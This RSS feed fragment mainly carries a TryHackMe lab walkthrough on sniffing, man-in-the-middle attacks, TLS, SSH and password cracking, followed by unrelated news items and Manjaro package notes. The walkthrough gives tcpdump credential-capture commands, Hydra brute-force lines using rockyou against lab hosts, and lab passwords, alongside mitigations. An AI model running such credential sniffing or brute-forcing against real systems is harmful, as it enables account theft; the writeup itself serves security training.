<guid isPermaLink="true">https://tsecurity.de/de/3646317/hacking/protocols-and-servers-2-tryhackme-writeup/</guid>
<pubDate>Sun, 05 Jul 2026 08:39:11 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>Somewhere on a network right now, a username and password are crossing the wire in plain, readable text — and someone could be quietly reading them.</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/900/1*7OqFQcrh6OcgOZyqGjAyqw.png"></figure><p>No exploit. No zero-day. Just a protocol that was never built to keep a secret.</p><p>That’s the uncomfortable little truth this room is built around. So let’s pull it apart.</p><p>Most of the internet’s classic protocols were designed in a more trusting era. It was a time when the people sharing a network mostly knew each other, and “someone might be listening” wasn’t the default assumption.</p><p>Those protocols still run everywhere. And many of them still send your credentials across the wire in plain text.</p><p><strong>Protocols and Servers 2</strong> on TryHackMe is about exactly that gap, and what closes it. It walks through three foundational attacks against network protocols, then the defenses that neutralize each one:</p><ul><li>Sniffing — quietly reading traffic off the wire</li><li>Man-in-the-Middle (MITM) — sitting between two parties and tampering</li><li>Password attacks — guessing or cracking the credentials themselves</li></ul><p>This is a writeup of the whole room: the concepts in plain language, the commands that matter, and the task answers explained. If you’re working through it yourself, follow along.</p><blockquote>One idea ties the entire room together: cleartext protocols are insecure by design. Everything else is a consequence of that single fact.</blockquote><h3>Part 1 — Sniffing Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/911/1*mxa7u-z6cA7UEL5f8tjJQg.png"></figure><p>A <strong>sniffing attack</strong> is the simplest idea in the room: use a packet-capture tool to grab traffic as it crosses the network, then read it.</p><p>If a protocol talks in cleartext, anyone positioned to see that traffic can pull out private messages or login credentials. Nothing is encrypted before it leaves your machine.</p><pre>"Isn't everything encrypted now?"</pre><p>It’s tempting to think sniffing is a solved, retro problem now that TLS is everywhere. It isn’t. It stays dangerous wherever cleartext still lives:</p><ul><li><strong>Internal corporate networks</strong>, where machine-to-machine traffic is often left unencrypted</li><li><strong>Legacy systems </strong>like old mail servers, embedded devices, and industrial control systems</li><li><strong>Misconfigured services</strong> where TLS is available but not strictly enforced</li><li><strong>IoT devices</strong> that habitually use plain protocols</li><li><strong>Wireless networks</strong>, where anyone in range can listen</li><li>After a MITM attack that has successfully downgraded or stripped encryption</li></ul><blockquote>In real internal pentests and red-team work, sniffing is still one of the most reliable ways to harvest credentials and learn how systems actually talk to each other.</blockquote><h3>The tools</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*xBxcZK8PVBApVtltOosP4Q.jpeg"><figcaption>Wireshark</figcaption></figure><p>Capturing packets needs a network card and the right privileges (root on Linux, administrator on Windows). Here are the staples:</p><ul><li><strong>tcpdump</strong> — lightweight open-source CLI capture tool, preinstalled on most Linux systems.</li><li><strong>Wireshark</strong> — the GUI standard, with powerful filtering, protocol dissection, and visualization.</li><li><strong>tshark</strong> — Wireshark’s command-line sibling, great for scripting.</li></ul><blockquote>Worth knowing too: <strong>tcpflow</strong> (reassembles TCP streams), <strong>ngrep</strong> (pattern-matching in traffic), and <strong>NetworkMiner</strong> (extracts files from captures).</blockquote><blockquote>Specialized credential-grabbers exist, but tcpdump and Wireshark can do the job with a little effort.</blockquote><h3>Capturing POP3 credentials with tcpdump</h3><p>The classic demo: a user checks email over POP3 (port 110, cleartext).</p><p>With access to the traffic — via a wiretap, a switch’s port mirroring, ARP spoofing, a compromised host, or a successful MITM — you run this command:</p><pre>sudo tcpdump port 110 -A</pre><p>Breaking that down:</p><ul><li>sudo — packet capture needs root privileges.</li><li>port 110 — only keep traffic to or from the POP3 server.</li><li>-A — print packet contents as ASCII, so cleartext is human-readable.</li></ul><p>In the capture, the login arrives across two packets and reads straight out:</p><pre>… USER frank … PASS D2xc9CgD</pre><p>Username frank, password D2xc9CgD, handed over in plain sight.</p><blockquote>Wireshark gets you there even faster: type “pop” in the display filter, and only POP3 traffic remains, credentials included.</blockquote><h4>Handy tcpdump filters</h4><pre>+------------------------------------+-----------------------------------------------------------+<br>| Command                            | Purpose                                                   |<br>+------------------------------------+-----------------------------------------------------------+<br>| sudo tcpdump port 110 -A           | Capture traffic on port 110 (POP3) in readable ASCII      |<br>| sudo tcpdump host 10.20.30.148 -A  | Capture ASCII traffic to/from a specific host IP          |<br>| sudo tcpdump port 80 -A            | Capture HTTP traffic (credentials in POST data)           |<br>| sudo tcpdump port 21 -A            | Capture FTP traffic (cleartext credentials)               |<br>| sudo tcpdump -w capture.pcap       | Save raw network packets to a file for later analysis     |<br>| tcpdump -r capture.pcap -A         | Read and display a saved capture file in ASCII text       |<br>+------------------------------------+-----------------------------------------------------------+</pre><h4>Mitigation</h4><p>Any cleartext protocol is exposed. The only requirement for the attack is a vantage point between the two parties or on the same network segment.</p><p>The core fix is encryption. This means wrapping the protocol in TLS (like HTTP to HTTPS, FTP to FTPS, or POP3 to POP3S) and replacing Telnet with SSH.</p><p>Layered on top of that:</p><ul><li>Network segmentation to limit who can see whose traffic</li><li>Encrypted VLANs or tunnels for sensitive internal traffic</li><li>802.1X port-based authentication so unknown devices can’t connect</li><li>Zero-trust thinking: treat every network as hostile and encrypt everything</li><li>Monitoring for ARP spoofing and other redirection to catch sniffing in progress</li></ul><p>Question: How do you capture only Telnet traffic with tcpdump? Answer: Telnet runs on port 23, so you add “port 23”.</p><p>Question: What is the simplest Wireshark display filter for IMAP? Answer: “imap”.</p><h3>Part 2 — Man-in-the-Middle (MITM) Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/678/1*uImWCNSpEizR46XoZzoc7g.png"><figcaption>Man-in-the-Middle Attack</figcaption></figure><p>Sniffing is passive listening. A <strong>MITM attack</strong> is active.</p><p>The attacker slips between two parties (A and B) so that A thinks it’s talking to B, while everything actually flows through the attacker. They can read and completely alter the data.</p><p>The room’s example says it best: A asks to transfer $20, the attacker rewrites the amount mid-flight, and B acts on the tampered message.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*C0zge6WQ4_HZjbPjnt1i0g.png"><figcaption>Image 1 from the room</figcaption></figure><p>It works whenever the protocol doesn’t verify the authenticity and integrity of each message.</p><h4>Getting into the middle</h4><p>To sit between two parties, an attacker has to redirect traffic through their own machine. Common routes include:</p><ul><li><strong>ARP spoofing</strong> — on a local network, the attacker sends forged ARP messages tying their own MAC address to the gateway’s IP, routing traffic directly to them.</li><li><strong>DNS spoofing </strong>— feeding false DNS answers to send victims to attacker-controlled servers.</li><li><strong>Rogue access points </strong>— fake Wi-Fi setups (like “Airport_WiFi_Free”) that route every connected victim’s traffic through the attacker.</li><li><strong>BGP hijacking </strong>— announcing false routes at the internet’s routing layer to reroute traffic for whole organizations or regions.</li></ul><h4>The tooling</h4><ul><li><strong>Bettercap </strong>— the modern, actively maintained successor to Ettercap. Handles ARP/DNS spoofing, HTTP/HTTPS proxying, and is modular.</li><li><strong>Ettercap</strong> — the classic LAN MITM tool. It still works, but Bettercap is generally preferred today.</li><li><strong>mitmproxy </strong>— an interactive HTTPS proxy used for inspecting and modifying web traffic on the fly.</li><li><strong>Responder </strong>—<strong> </strong>Windows-focused<strong>.</strong> Abuses fallback name-resolution protocols (LLMNR, NBT-NS) that kick in when DNS fails, answering with its own IP to capture authentication hashes. A staple of internal Active Directory pentests.</li></ul><h4>MITM against encrypted traffic</h4><p>Encryption raises the bar, but it isn’t a magic shield:</p><ul><li><strong>SSL stripping</strong> — quietly downgrade the victim’s connection to plain HTTP while the attacker keeps an HTTPS link to the real server. This is easy to miss if the user never typed <em>“https://”</em> or didn’t check for the padlock icon.</li><li><strong>Fake certificates</strong> — present your own certificate and run two separate encrypted legs. This works if the victim blindly clicks through the browser warning or if a Certificate Authority is compromised.</li><li><strong>Compromised or rogue CAs </strong>— the most serious case. If an attacker controls a trusted CA, they can mint valid-looking certificates for absolutely any domain.</li></ul><h4>Modern defenses</h4><p>A decade of security hardening makes MITM much harder now:</p><ul><li><strong>HTTPS by default</strong> (browsers flag plain HTTP as “Not Secure”)</li><li><strong>HSTS</strong> (forces HTTPS and blocks stripping attacks)</li><li><strong>Certificate Transparency</strong> (public, auditable logs of all issued certificates)</li><li><strong>Certificate pinning</strong> (apps accept only specific, hardcoded keys)</li><li><strong>DANE</strong> (publishing certificate info in DNSSEC-signed DNS)</li></ul><p>MITM still succeeds when users ignore certificate warnings, apps validate keys poorly, the target speaks cleartext, or legacy gear lacks modern features.</p><p>The fundamental fix remains the same: cryptography. You need authentication plus encryption/signing, which is exactly what properly implemented TLS provides.</p><p><strong>Question 1:</strong> How many interfaces does Ettercap offer?</p><pre>Answer: 3</pre><p><strong>Question 2:</strong> How many ways can you invoke Bettercap?</p><pre>Answer: 3</pre><h3>Part 3 — TLS: The Fix for Both Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/622/1*3Qn-dR4Ps9kwTxZGqRBBHw.jpeg"></figure><p>Both sniffing and MITM share one cure: TLS (Transport Layer Security). This part of the room is the solution chapter.</p><h4>A quick history</h4><p>SSL appeared in 1994 via Netscape, with SSL 3.0 dropping in 1996 as the web grew into shopping and payments. TLS succeeded it in 1999.</p><p>Where things stand now:</p><ul><li>SSL 2.0 and 3.0 are deprecated and highly insecure. Never use them.</li><li>TLS 1.0 and 1.1 were officially deprecated in 2021 and dropped by major browsers.</li><li>TLS 1.2 (from 2008) is still widely used and secure when configured with modern ciphers.</li><li>TLS 1.3 (from 2018) is the current standard. It features fewer algorithms, a faster handshake, and forward secrecy by default.</li></ul><p>People still say “SSL certificate” out of habit, but in practice, everything modern uses TLS.</p><h4>Where TLS sits</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Q9wEkyyAKPn28lVN9bDX2Q.png"><figcaption>Image 2 from the room</figcaption></figure><p>Cleartext application-layer protocols send data entirely in the open.</p><p>TLS adds encryption just below the application protocol, wrapping its data before it hits the network card. On the OSI model, it lives right between the transport and application layers.</p><h4>Upgrading protocols with TLS</h4><ul><li>HTTP (Port 80) upgrades to HTTPS (Port 443)</li><li>FTP (Port 21) upgrades to FTPS (Port 990)</li><li>SMTP (Port 25) upgrades to SMTPS (Port 465)</li><li>POP3 (Port 110) upgrades to POP3S (Port 995)</li><li>IMAP (Port 143) upgrades to IMAPS (Port 993)</li></ul><p>It’s not just web and mail. DNS can be wrapped too via DoT (DNS over TLS) on port 853, or DoH (DNS over HTTPS) on port 443. Both stop eavesdroppers from seeing which sites you look up.</p><h4>Implicit TLS vs STARTTLS</h4><ul><li>Implicit TLS uses a dedicated port that is fully encrypted from the very first byte (like 443 or 993).</li><li>STARTTLS connects in cleartext on the normal port, then issues a “STARTTLS” command to upgrade the connection in place. This is common for email setup.</li></ul><blockquote>Both offer encryption, but implicit TLS is highly preferred.</blockquote><p>A MITM attacker can easily strip the STARTTLS command during negotiation and force the session to stay in cleartext if the client isn’t configured to require it.</p><h4>How HTTPS works</h4><p>Plain HTTP takes two steps: open a TCP connection, then send requests. HTTPS inserts a step in between:</p><ol><li>Establish a standard TCP connection.</li><li>Establish a TLS connection (the handshake).</li><li>Send the HTTP requests, which are now fully encrypted.</li></ol><p>A simplified TLS 1.2 handshake goes like this:</p><blockquote><strong>ClientHello</strong> (client offers its TLS versions and cipher suites) <strong>→</strong> <strong>ServerHello</strong> (server picks the parameters and sends its certificate) <strong>→ Key Exchange</strong> (both derive a shared secret)<strong> →</strong> <strong>Finished</strong> (both confirm and switch to encrypted communication):</blockquote><pre>ClientHello → ServerHello → Key Exchange → Finished</pre><h4>Certificates and trust</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/980/1*-10wNzrM0tEpRINoAqc5mQ.png"><figcaption>Certificate Authority (CA)</figcaption></figure><p>HTTPS leans on certificates signed by trusted Certificate Authorities (CAs). Your browser expects a valid certificate from a trusted CA, which proves you’re talking to the real server and blocks easy MITM attempts.</p><p>A certificate shows who it was issued to, who issued it, and its validity period. An expired certificate should never be trusted.</p><p>The modern ecosystem made this nearly universal thanks to automated platforms like <a href="https://letsencrypt.org/"><em>Let’s Encrypt</em></a>, which pushed global HTTPS traffic past 95%.</p><p><strong>Question:</strong> What is the three-letter acronym for the DNS protocol that uses TLS?</p><pre>Answer: DoT (DNS over TLS)</pre><h3>Part 4 — SSH: Secure Remote Administration</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/920/1*EidIDqyfQGBr2l3Y-KLmog.png"><figcaption>SSH</figcaption></figure><p>SSH (Secure Shell) is the secure replacement for Telnet. It is the universal way to administer servers, network gear, and cloud infrastructure.</p><p>The “S” means you can confirm the server’s identity, your messages are encrypted for the intended recipient only, and any data tampering is instantly detectable.</p><blockquote>It handles confidentiality and integrity seamlessly over port 22.</blockquote><h4>Authentication methods</h4><ul><li><strong>Password </strong>— The simplest method. The password rides the encrypted channel, but weak choices can still fall to brute-force attacks.</li><li><strong>Public key (recommended) </strong>— A private key stays on your machine, while the public key goes on the server. The server challenges you to prove you hold the private key without ever transmitting it.</li><li><strong>Certificate-based </strong>— An SSH CA signs user and host keys. This scales incredibly well because you don’t have to manually distribute public keys to every single server.</li><li><strong>MFA </strong>— Combines a traditional key or password with a one-time code for high-security environments.</li></ul><h4>Connecting</h4><ul><li>To connect, you run:</li></ul><pre>ssh mark@MACHINE_IP</pre><p>Enter the password or let your key authenticate, and you are on the remote terminal. Every single command you send runs over an encrypted channel.</p><p><strong>Question:</strong> Connect as mark (password XBtc49AB) and find the kernel release with uname -r.</p><pre>Commands: ssh mark@MACHINE_IP uname -r</pre><pre>Answer: 5.15.0–119-generic</pre><h4>Host key verification</h4><p>On your very first connection, SSH shows the server’s key fingerprint and asks if you want to continue.</p><p>Ideally, you verify this fingerprint through an admin or config management before typing “yes”. It is then saved in your local known_hosts file.</p><p>If that key ever changes unexpectedly in the future, SSH throws a massive warning, a major indicator of a potential MITM attack or a reinstalled server.</p><h4>Generating keys</h4><ul><li>To create a new key pair, run:</li></ul><pre>ssh-keygen -t ed25519 -C "your_email@example.com"</pre><p>The private key stays strictly on your machine and should be passphrase-protected. The public key (.pub) is safe to share. You can push it to a remote server easily using:</p><pre>ssh-copy-id mark@MACHINE_IP</pre><h4>Useful options</h4><pre>+--------------------------------------------+------------------------------------------------------------+<br>| Command                                    | Purpose                                                    |<br>+--------------------------------------------+------------------------------------------------------------+<br>| ssh -p 2222 mark@MACHINE_IP                | Connect to a remote server running on a non-standard port   |<br>| ssh -i ~/.ssh/custom_key mark@MACHINE_IP   | Specify a specific private key file to use for login       |<br>| ssh -J bastion.example.com mark@internal   | Jump through a secure bastion host to reach an internal IP |<br>| ssh -L 8080:localhost:80 mark@MACHINE_IP   | Set up a local port forward to tunnel traffic through SSH  |<br>| ssh -D 9050 mark@MACHINE_IP                | Create a dynamic SOCKS proxy forward for traffic routing   |<br>| ssh mark@MACHINE_IP "cat /etc/passwd"      | Run a single, one-off command without opening a full shell |<br>+--------------------------------------------+------------------------------------------------------------+</pre><h4>Secure file transfer</h4><ul><li><strong>SFTP</strong> — Interactive, FTP-like file management running completely over SSH. This is the recommended choice today.</li><li><strong>SCP </strong>— Simple file copies over SSH. This is now deprecated by OpenSSH in favor of SFTP, though it still works on most systems.</li><li><strong>rsync over SSH </strong>— The best option for large or repeated transfers because it only copies the specific parts of files that changed.</li></ul><p>To copy files via SCP:</p><pre>scp mark@MACHINE_IP:/home/mark/archive.tar.gz ~/ (remote to local)</pre><pre>scp backup.tar.bz2 mark@MACHINE_IP:/home/mark/ (local to remote)</pre><p><strong>Quick clarifier:</strong></p><blockquote>SFTP runs over SSH (port 22).</blockquote><blockquote>FTPS is FTP-over-TLS (port 990).</blockquote><p>They are entirely different protocols despite having similar names.</p><p><strong>Question:</strong> Download book.txt from the remote system; what download size did scp display in KB?</p><pre>Command: scp mark@MACHINE_IP:/home/mark/book.txt ~/</pre><pre>Answer: 415</pre><h4>Hardening SSH</h4><p>To protect a server, you can modify its config file <em>(/etc/ssh/sshd_config)</em>:</p><ul><li>Set PasswordAuthentication to “no” once public keys are established.</li><li>Set PermitRootLogin to “no” to force users to log in with regular accounts first.</li><li>Use AllowUsers or AllowGroups to create an explicit access whitelist.</li><li>Change the default port to reduce automated log noise.</li><li>Deploy fail2ban to automatically block IPs with repeated failed login attempts.</li></ul><h3>Part 5 — Password Attacks</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*6_lWVwmNlB93-2JkYWo8Og.png"></figure><p>Even with a network fully encrypted, authentication remains a primary target. Authentication is simply the act of proving your identity, like entering a password to access a service.</p><p>The three factors:</p><ul><li><strong>Something you know </strong>— a password or PIN</li><li><strong>Something you have </strong>— a phone, hardware security key, or smart card</li><li><strong>Something you are </strong>— a fingerprint or facial scan</li></ul><p>This section focuses entirely on attacking “something you know.”</p><h4>Why weak passwords persist</h4><p>Massive historic breaches show that old habits die hard.</p><p>The most common passwords found in modern breaches still include variations like 123456, password, qwerty, Password1, and seasonal choices like Summer2024.</p><p>Because people constantly reuse passwords across multiple sites, a single leak frequently gives attackers access to entirely unrelated corporate or personal accounts.</p><h4>Types of attacks</h4><ul><li><strong>Guessing </strong>— using personal info like a target’s pet, birth year, or favorite sports team harvested from social media.</li><li><strong>Dictionary</strong>— automatically trying lists of real words and common variations.</li><li><strong>Brute force </strong>— systematically trying every possible characters combination. This is exhaustive, which is why password length matters so much.</li><li><strong>Credential stuffing</strong> — taking leaked username/password pairs from old breaches and automatically testing them against other web services.</li><li><strong>Password spraying </strong>— testing one or two incredibly common passwords against a massive list of user accounts to dodge lockout policies.</li><li><strong>Hybrid</strong> — combining dictionary words with systematic patterns, like capitalizing the first letter and adding a year to the end.</li></ul><h4>Wordlists</h4><ul><li>The classic go-to wordlist is RockYou, located on the TryHackMe AttackBox at:</li></ul><pre>/usr/share/wordlists/rockyou.txt</pre><blockquote>Beyond that, security professionals use collections like SecLists, CrackStation lists, or custom-generated lists tailored specifically to the target’s language, region, or industry habits.</blockquote><h4>THC Hydra</h4><p>Hydra is a fast network login cracker that throws wordlists at live services like FTP, POP3, IMAP, SSH, and HTTP.</p><p>The basic syntax looks like this:</p><pre>hydra -l username -P wordlist.txt server service</pre><ul><li>-l specifies a single username (-L for a text file of names)</li><li>-P specifies a password wordlist (-p for a single password)</li><li>server is the target IP or hostname</li><li>service is the protocol you are targeting</li></ul><p>Examples:</p><pre>hydra -l mark -P /usr/share/wordlists/rockyou.txt MACHINE_IP ftp<br>hydra -l frank -P /usr/share/wordlists/rockyou.txt MACHINE_IP ssh<br>hydra -l lazie -P /usr/share/wordlists/rockyou.txt MACHINE_IP imap</pre><p>Handy options include -s to target a non-default port, -vV for detailed verbosity, -t to adjust parallel attack threads, and -f to immediately stop execution when the first valid password is found.</p><h4>Other tools</h4><p>Alternative online crackers include <strong>Medusa</strong> and <strong>Ncrack</strong>.</p><p>For Windows and Active Directory environments, tools like <strong>NetExec</strong> excel at spraying credentials over SMB and LDAP.</p><p>If you manage to dump password hashes from a database, offline tools like <strong>Hashcat</strong> or <strong>John the Ripper </strong>are used because they can guess millions of combinations per second without worrying about network lag or lockouts.</p><h4>Mitigation</h4><p>Defending against password attacks requires a modern approach to identity management:</p><ul><li>Enforce <strong>length-first password policies</strong> based on NIST guidelines. Favor overall length over complex character rotation, and check new passwords against lists of known compromised credentials.</li><li>Implement <strong>strict account lockout</strong> or <strong>throttling mechanisms</strong> to kill automated automated guessing, while remaining aware of password spraying patterns.</li><li>Use <strong>CAPTCHAs</strong> to prevent basic bot execution on login forms.</li><li>Deploy <strong>Multi-Factor Authentication (MFA)</strong> across all external endpoints.</li><li>Transition toward <strong>passwordless ecosystems</strong>, utilizing passkeys (FIDO2/WebAuthn), hardware keys, or verified magic links.</li></ul><p><strong>Question: </strong>One email account is lazie; what password accesses the IMAP service?</p><pre>Command: hydra -l lazie -P /usr/share/wordlists/rockyou.txt MACHINE_IP imap</pre><pre>Answer: butterfly</pre><h3>Key Takeaways</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*35eDunQG0NLCy_K2XVOvtA.jpeg"></figure><p>The fundamental rule of network security is simple:</p><blockquote>Cleartext protocols are inherently insecure.</blockquote><p>Anything sent without encryption can be effortlessly intercepted by sniffing or manipulated via a Man-in-the-Middle attack.</p><p>The security path forward is uniform across all services:</p><ul><li>Use HTTPS instead of HTTP</li><li>Use SSH instead of Telnet</li><li>Use SFTP or FTPS instead of basic FTP</li><li>Use IMAPS, POP3S, and SMTPS instead of their legacy cleartext variants</li></ul><p>Even when a connection is perfectly encrypted, weak passwords remain a glaring vulnerability.</p><p>Secure the protocol with robust encryption, then secure the account with long passwords, rate limiting, and multi-factor authentication.</p><h4>Quick Port Reference Guide</h4><pre>+-------------------+------+----------------+<br>| Protocol          | Port | Security       |<br>+-------------------+------+----------------+<br>| FTP               | 21   | Cleartext      |<br>| FTPS              | 990  | TLS (implicit) |<br>| HTTP              | 80   | Cleartext      |<br>| HTTPS             | 443  | TLS (implicit) |<br>| IMAP              | 143  | Cleartext      |<br>| IMAPS             | 993  | TLS (implicit) |<br>| POP3              | 110  | Cleartext      |<br>| POP3S             | 995  | TLS (implicit) |<br>| SMTP              | 25   | Cleartext      |<br>| SMTP submission   | 587  | STARTTLS       |<br>| SMTPS             | 465  | TLS (implicit) |<br>| SSH / SFTP        | 22   | Encrypted (SSH)|<br>| Telnet            | 23   | Cleartext      |<br>+-------------------+------+----------------+</pre><p><em>Room: Protocols and Servers 2 — TryHackMe (</em><a href="https://tryhackme.com/room/protocolsandservers2"><em>https://tryhackme.com/room/protocolsandservers2</em></a><em>). This writeup is for educational purposes; only test systems you’re authorized to. Have fun!</em></p><p><em>This article was written by Pop123 as a walkthrough for the TryHackMe lab. I am as always open to further discussing the topic.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=42c2d01f5c6c" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/protocols-and-servers-2-tryhackme-writeup-42c2d01f5c6c">Protocols and Servers 2 TryHackMe Writeup</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[WELT SECURITY SUMMIT: "That's what they're worried about!" Cybersecurity | Is NATO in ...]]></title>
<description><![CDATA[... cybersecurity. The focus was on how Europe can assume greater responsibility for its own security as the US increasingly withdraws. Topics ...]]></description>
<link>https://tsecurity.de/de/3645185/it-security-nachrichten/welt-security-summit-thats-what-theyre-worried-about-cybersecurity-is-nato-in/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645185/it-security-nachrichten/welt-security-summit-thats-what-theyre-worried-about-cybersecurity-is-nato-in/</guid>
<pubDate>Sat, 04 Jul 2026 12:24:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... cybersecurity. The focus was on how Europe can assume greater responsibility for its own <b>security</b> as the US increasingly withdraws. Topics ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Americans disgusted at Trump earning $1bn from crypto as president: ‘Obviously a grift’]]></title>
<description><![CDATA[Hundreds of Guardian readers expressed concerns over greed in the White House and a billionaire president unconcerned with high gas and grocery pricesDonald Trump has earned more than $1bn from his crypto businesses since returning to the White House, according to recent financial disclosures.Ami...]]></description>
<link>https://tsecurity.de/de/3645034/it-nachrichten/americans-disgusted-at-trump-earning-1bn-from-crypto-as-president-obviously-a-grift/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645034/it-nachrichten/americans-disgusted-at-trump-earning-1bn-from-crypto-as-president-obviously-a-grift/</guid>
<pubDate>Sat, 04 Jul 2026 10:17:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hundreds of Guardian readers expressed concerns over greed in the White House and a billionaire president unconcerned with high gas and grocery prices</p><p><a href="https://www.theguardian.com/us-news/donaldtrump">Donald Trump</a> has earned more than $1bn from his crypto businesses since returning to the White House, <a href="https://www.theguardian.com/us-news/2026/jul/01/crypto-ventures-stock-key-takeaways-trump-financial-disclosures">according to</a> recent financial disclosures.</p><p>Amid questions of conflict of interest, more than 400 Americans expressed feelings of outrage, disgust and despair at their president. They answered a Guardian <a href="https://www.theguardian.com/us-news/2026/jul/01/trump-earnings-second-term-callout">call for their views on Trump’s fortune</a>.</p> <a href="https://www.theguardian.com/us-news/2026/jul/03/americans-disgusted-trump-crypto">Continue reading...</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-07-04 - Kernels, Firefox, Thunderbird, KDE Gear, COSMIC, QEmu]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected Mid or End of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may f...]]></description>
<link>https://tsecurity.de/de/3644989/unix-server/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644989/unix-server/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/</guid>
<pubDate>Sat, 04 Jul 2026 09:46:33 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected Mid or End of July. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may found thus far.</p>
<h3><a name="p-864416-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-864416-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-864416-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-864416-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/188735/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/188735/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/188735/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-1-bian-may-preview-released/187389" class="inline-onebox">Manjaro 26.1 Bian-May - Preview released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.19.14, the 6.19 series is now EOL (End Of Life). Please install 7.0, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 7.0.14, the 7.0 series is now EOL (End Of Life). Please install 7.1, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News <a href="https://forum.manjaro.org/t/testing-update-2026-07-04-kernels-firefox-thunderbird-kde-gear-cosmic-qemu/188735/1">(click for more details)</a>
<h2><a name="p-864416-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-864416-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>Kernels</strong> got updated
<ul>
<li><strong>linux70</strong> series is now marked EOL</li>
<li><strong>linux-firmware</strong> <a href="https://gitlab.com/kernel-firmware/linux-firmware/-/compare/20260519...20260622?from_project_id=48890189">20260622</a></li>
<li>slight <strong>toolchain</strong> update</li>
<li>we dropped <strong>NVIDIA</strong> driver series 570xx and 575xx</li>
</ul>
</li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/en-US/firefox/152.0.4/releasenotes/">152.0.4</a></li>
<li><strong>Thunderbird</strong> <a href="https://www.thunderbird.net/en-US/thunderbird/152.0/releasenotes">152.0</a></li>
<li><strong>Virtualbox</strong> <a href="https://www.virtualbox.org/wiki/Changelog-7.2">7.2.12</a></li>
<li><strong>Godot</strong> <a href="https://godotengine.org/releases/4.7/">4.7</a></li>
<li><strong>Pipewire</strong> <a href="https://gitlab.freedesktop.org/pipewire/pipewire/-/releases/1.6.7">1.6.7</a></li>
<li><strong>Systemd</strong> <a href="https://github.com/systemd/systemd/compare/v260.2...v261.1">261.1</a></li>
<li><strong>COSMIC</strong> Epoch <a href="https://github.com/pop-os/cosmic-epoch/releases/tag/epoch-1.2.0">1.2.0</a></li>
<li><strong>KDE Gear</strong> <a href="https://kde.org/announcements/gear/26.04.3/">26.04.3</a></li>
<li><strong>QEmu</strong> <a href="https://www.qemu.org/2026/04/22/qemu-11-0-0/">11.0.2</a></li>
</ul>
